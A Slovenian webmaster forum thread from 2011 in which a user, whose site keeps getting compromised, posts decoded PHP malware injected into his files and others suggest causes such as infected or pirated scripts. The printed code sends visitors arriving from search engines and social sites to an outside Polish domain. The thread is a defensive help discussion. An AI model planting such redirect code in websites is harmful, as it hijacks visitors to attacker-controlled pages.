Stalno vdiranje na spletno stran
 
jWeb 12. sep 2011 09:27:37 Pridružen od:
6. mar 2010
365 objav
451 119 5
#11

sloslo, sporoči mi na PM celo kodo in bom preveril, kaj dejansko naredi...


všeč(0) ni všeč(0) spam(0)
 
sloslo 12. sep 2011 10:22:48 Pridružen od:
14. jul 2011
157 objav
158 9 4
#12

Leo:

Kakšna pa je koda, če jo decodaš s tem http://www.opinionatedgeek.com/dotnet/tools/base64decode/?




Koda (tudi zate JWeb):

errorreporting(0);

$qazplm=headers
sent();

if (!$qazplm){

$referer=$SERVER['HTTPREFERER'];

$uag=$SERVER['HTTPUSER_AGENT'];

if ($uag) {

if (stristr($referer,"yandex") or stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"baidu.com") or stristr($referer,"doubleclick.net") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or stristr($referer,"clickbank.net") or stristr($referer,"blogspot.com") or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {

if (!stristr($referer,"cache") or !stristr($referer,"inurl")){

header("Location: http://breakingbad.osa.pl/");

exit();

}

}

}

}


všeč(0) ni všeč(0) spam(0)
 
jWeb 12. sep 2011 10:48:14 Pridružen od:
6. mar 2010
365 objav
451 119 5
#13

Aha, preusmeritev k poljaku :P



Sledi o "vdoru" ne boš našel, ker ti nihčer ne vdira ampak se preko skripte doda škodljiva koda... Moral boš najti izvor - katera datoteka ti generira to kodo in zapiše po različnih datotekah... Če imaš kak odprtokodni sistem, ki sicer sam po sebi ni škodljiv (Joomla, WP, Drupal,...) potem je razlog verjetno (razen če ima še kdo dostop do tvojega strežnika) kakšna komponenta, modul,... ki si jih nalagal. Če uporabljaš neko skripto kot celoten protal, potem je lahko že ta "škodljiva" oziroma, če si dobil kakšno "skrekano" skripto oziroma jo pridobil s kakšnega portala kjer "brezplačno" objavljajo komercialne skripte, potem si si pač naložil okuženo skripto...


všeč(3) ni všeč(0) spam(0)
 
emcee 12. sep 2011 11:14:16 Pridružen od:
28. jul 2008
60 objav
52 10 0
#14

Možen vzrok je tudi tema, sem že v nekaj free temah našel take cvetke.


všeč(2) ni všeč(0) spam(0)
 
sloslo 12. sep 2011 11:21:06 Pridružen od:
14. jul 2011
157 objav
158 9 4
#15

emcee:

Možen vzrok je tudi tema, sem že v nekaj free temah našel take cvetke.




Tema ne bo mogla bit vzrok, gre za kupljeno skripto, design je bil ročno predelan.


všeč(0) ni všeč(0) spam(0)
 
Lucifix 12. sep 2011 11:23:41 Pridružen od:
14. okt 2008
744 objav
438 12 0
#16

Tudi kupljene skripe vsebujejo razne varnostne luknje ;)


všeč(2) ni všeč(0) spam(0)
 
bilten 12. sep 2011 11:32:50 Pridružen od:
14. okt 2007
1041 objav
612 1190 116
#17

ko so predleoval temo si pozabil odstranit pravice oz spremnit nazaj oz nimas instalirnega na serverju zascite


všeč(0) ni všeč(0) spam(0)
 
bilten 12. sep 2011 11:34:34 Pridružen od:
14. okt 2007
1041 objav
612 1190 116
#18

aja free teme za wp imajo povecini tudi kodirane dele to pa zaro da tega ne mores spreminjat in nimajo veze s pirshing napadi ..


všeč(0) ni všeč(0) spam(0)
 
sloslo 12. sep 2011 11:39:53 Pridružen od:
14. jul 2011
157 objav
158 9 4
#19

bilten:

ko so predleoval temo si pozabil odstranit pravice oz spremnit nazaj oz nimas instalirnega na serverju zascite




Ne vem zakaj bi kupljena skripta z eno samo temo bila kakorkoli zaščitena, saj ni uporabna za nikamor drugam.

Skripta je standalone in ni kaka Joomla, WP,...


všeč(0) ni všeč(0) spam(0)
 
sloslo 13. sep 2011 09:28:50 Pridružen od:
14. jul 2011
157 objav
158 9 4
#20

Počistu sm eval decode kodo, zamenju vse ftp accounte, preveru za viruse.

Če se bo problem spet pojavil to verjetno pomeni da je nekaj narobe s skripto, ki sem jo pošteno plačal?


všeč(0) ni všeč(0) spam(0)
 
 

🔒 Za odgovor na to temo se moraš prijaviti.

Prijavi se